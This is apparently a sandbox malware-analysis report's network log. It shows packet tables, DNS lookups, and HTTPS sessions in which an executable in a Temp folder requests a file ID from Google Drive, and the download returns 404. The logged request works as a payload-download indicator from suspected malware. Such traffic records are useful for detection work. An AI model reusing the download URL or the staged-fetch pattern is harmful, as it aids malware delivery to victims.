                                                                                                      Jan 11, 2025 00:50:33.749912024 CET49998443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:33.749918938 CET44349998142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:33.750148058 CET49998443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:33.750154018 CET44349998142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:34.192627907 CET44349998142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:34.192706108 CET44349998142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:34.192784071 CET44349998142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:34.192800045 CET49998443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:34.192800045 CET49998443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:34.192874908 CET49998443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:34.193584919 CET49998443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:34.193628073 CET44349998142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:34.315360069 CET49999443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:34.315404892 CET44349999216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:34.315516949 CET49999443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:34.315804958 CET49999443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:34.315815926 CET44349999216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:34.964620113 CET44349999216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:34.964704990 CET49999443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:34.965437889 CET44349999216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:34.965497971 CET49999443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:34.967255116 CET49999443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:34.967263937 CET44349999216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:34.967533112 CET44349999216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:34.967581987 CET49999443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:34.967992067 CET49999443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:35.011332989 CET44349999216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:35.356326103 CET44349999216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:35.356406927 CET44349999216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:35.356410027 CET49999443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:35.356445074 CET49999443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:35.356607914 CET49999443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:35.356622934 CET44349999216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:35.366463900 CET50000443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:35.366508007 CET44350000142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:35.366586924 CET50000443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:35.366805077 CET50000443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:35.366816998 CET44350000142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:35.998784065 CET44350000142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:35.998878956 CET50000443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:35.999373913 CET50000443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:35.999382973 CET44350000142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:35.999564886 CET50000443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:35.999571085 CET44350000142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:36.435245991 CET44350000142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:36.435338974 CET44350000142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:36.435379028 CET50000443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:36.435395956 CET44350000142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:36.435420990 CET50000443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:36.435435057 CET50000443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:36.436041117 CET50000443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:36.436058998 CET44350000142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:36.565651894 CET50001443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:36.565690994 CET44350001216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:36.566052914 CET50001443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:36.566052914 CET50001443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:36.566081047 CET44350001216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:37.340688944 CET44350001216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:37.340810061 CET50001443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:37.341473103 CET50001443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:37.341485023 CET44350001216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:37.341636896 CET50001443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:37.341643095 CET44350001216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:37.723877907 CET44350001216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:37.724031925 CET50001443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:37.724054098 CET44350001216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:37.724148989 CET50001443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:37.724191904 CET50001443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:37.724240065 CET44350001216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:37.724298000 CET50001443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:37.737397909 CET50002443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:37.737453938 CET44350002142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:37.737539053 CET50002443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:37.737785101 CET50002443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:37.737798929 CET44350002142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:38.368727922 CET44350002142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:38.368915081 CET50002443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:38.369699955 CET50002443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:38.369725943 CET44350002142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:38.369879007 CET50002443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:38.369887114 CET44350002142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:38.875657082 CET44350002142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:38.875701904 CET44350002142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:38.875711918 CET50002443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:38.875730038 CET44350002142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:38.875741959 CET50002443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:38.875763893 CET50002443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:38.876432896 CET44350002142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:38.876477003 CET50002443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:38.876480103 CET44350002142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:38.876518965 CET50002443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:38.876997948 CET50002443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:38.877015114 CET44350002142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:39.002749920 CET50003443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:39.002803087 CET44350003216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:39.002897024 CET50003443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:39.003201962 CET50003443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:39.003217936 CET44350003216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:39.632199049 CET44350003216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:39.632291079 CET50003443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:39.632977009 CET44350003216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:39.633040905 CET50003443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:39.634635925 CET50003443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:39.634644985 CET44350003216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:39.634911060 CET44350003216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:39.634963989 CET50003443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:39.635309935 CET50003443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:39.679328918 CET44350003216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:40.025145054 CET44350003216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:40.025221109 CET50003443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:40.025235891 CET44350003216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:40.025284052 CET50003443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:40.025387049 CET50003443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:40.025432110 CET44350003216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:40.025515079 CET50003443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:40.039063931 CET50004443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:40.039093018 CET44350004142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:40.039170027 CET50004443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:40.039412975 CET50004443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:40.039426088 CET44350004142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:40.686078072 CET44350004142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:40.686182022 CET50004443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:40.686718941 CET50004443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:40.686726093 CET44350004142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:40.686903000 CET50004443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:40.686908007 CET44350004142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:41.137833118 CET44350004142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:41.137921095 CET44350004142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:41.137963057 CET50004443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:41.137974024 CET44350004142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:41.137985945 CET50004443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:41.137996912 CET44350004142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:41.138040066 CET50004443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:41.138590097 CET50004443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:41.138602972 CET44350004142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:41.267991066 CET50005443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:41.268032074 CET44350005216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:41.268146038 CET50005443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:41.268419027 CET50005443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:41.268435955 CET44350005216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:41.909974098 CET44350005216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:41.910105944 CET50005443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:41.910727024 CET44350005216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:41.910803080 CET50005443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:41.912513971 CET50005443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:41.912528038 CET44350005216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:41.912810087 CET44350005216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:41.912858963 CET50005443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:41.913320065 CET50005443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:41.955343962 CET44350005216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:42.313087940 CET44350005216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:42.313154936 CET50005443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:42.313170910 CET44350005216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:42.313411951 CET50005443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:42.313970089 CET44350005216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:42.314026117 CET44350005216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:42.314047098 CET50005443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:42.314066887 CET50005443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:42.314285040 CET50005443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:42.314299107 CET44350005216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:42.325328112 CET50006443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:42.325370073 CET44350006142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:42.325434923 CET50006443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:42.325656891 CET50006443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:42.325670004 CET44350006142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:42.964669943 CET44350006142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:42.964768887 CET50006443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:42.965399027 CET50006443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:42.965409040 CET44350006142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:42.965621948 CET50006443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:42.965629101 CET44350006142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:43.407895088 CET44350006142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:43.407970905 CET44350006142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:43.408024073 CET50006443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:43.408044100 CET44350006142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:43.408051014 CET50006443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:43.408083916 CET50006443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:43.408951044 CET50006443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:43.408977032 CET44350006142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:43.534148932 CET50007443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:43.534192085 CET44350007216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:43.534333944 CET50007443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:43.534714937 CET50007443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:43.534730911 CET44350007216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:44.180753946 CET44350007216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:44.180980921 CET50007443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:44.181487083 CET50007443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:44.181493998 CET44350007216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:44.181688070 CET50007443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:44.181691885 CET44350007216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:44.569806099 CET44350007216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:44.569875002 CET50007443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:44.570031881 CET50007443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:44.570086956 CET44350007216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:44.570152044 CET50007443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:44.579649925 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:44.579696894 CET44350008142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:44.579818964 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:44.580110073 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:44.580130100 CET44350008142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.204994917 CET44350008142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.205271006 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:45.205554962 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:45.205562115 CET44350008142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.205735922 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:45.205741882 CET44350008142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.643047094 CET44350008142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.643102884 CET44350008142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.643160105 CET44350008142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.643171072 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:45.643194914 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:45.643234968 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:45.644073963 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:45.644093037 CET44350008142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.768207073 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:45.768266916 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.768364906 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:45.768618107 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:45.768637896 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.425451994 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.425590992 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.426233053 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.426294088 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.427736998 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.427747011 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.427990913 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.428055048 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.428324938 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.475336075 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.819884062 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.819997072 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.820039988 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.820090055 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.820486069 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.820519924 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.820553064 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.820574045 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.826643944 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.826677084 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.838766098 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:46.838807106 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.838916063 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:46.839118004 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:46.839132071 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.471735001 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.471874952 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:47.472374916 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:47.472387075 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.472541094 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:47.472558022 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.905451059 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.905519962 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:47.905529976 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.905575037 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:47.905585051 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.905590057 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.905633926 CET50010443192.168.2.7142.250.181.225

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jan 11, 2025 00:49:58.901803017 CET6046553192.168.2.71.1.1.1
                                                                                                      Jan 11, 2025 00:49:58.909946918 CET53604651.1.1.1192.168.2.7
                                                                                                      Jan 11, 2025 00:50:00.520577908 CET6132453192.168.2.71.1.1.1
                                                                                                      Jan 11, 2025 00:50:00.528120995 CET53613241.1.1.1192.168.2.7

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Jan 11, 2025 00:49:58.901803017 CET192.168.2.71.1.1.10x4ab9Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                      Jan 11, 2025 00:50:00.520577908 CET192.168.2.71.1.1.10x6824Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Jan 11, 2025 00:48:38.475827932 CET1.1.1.1192.168.2.70x5623No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                      Jan 11, 2025 00:48:38.475827932 CET1.1.1.1192.168.2.70x5623No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                      Jan 11, 2025 00:49:58.909946918 CET1.1.1.1192.168.2.70x4ab9No error (0)drive.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                      Jan 11, 2025 00:50:00.528120995 CET1.1.1.1192.168.2.70x6824No error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • drive.google.com
                                                                                                      • drive.usercontent.google.com

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.749969216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:00 UTC216OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      2025-01-10 23:50:00 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:00 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-Xud6vnwMag4tASp5LADmRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.749970142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:01 UTC258OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2025-01-10 23:50:01 UTC2227INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgRLVVHvRjh54fH2-gt35XPbgdTelw0Mc8ZLRCV9Ssh1c3kr2Wv6Xn0SUyZQjkuZ4zww
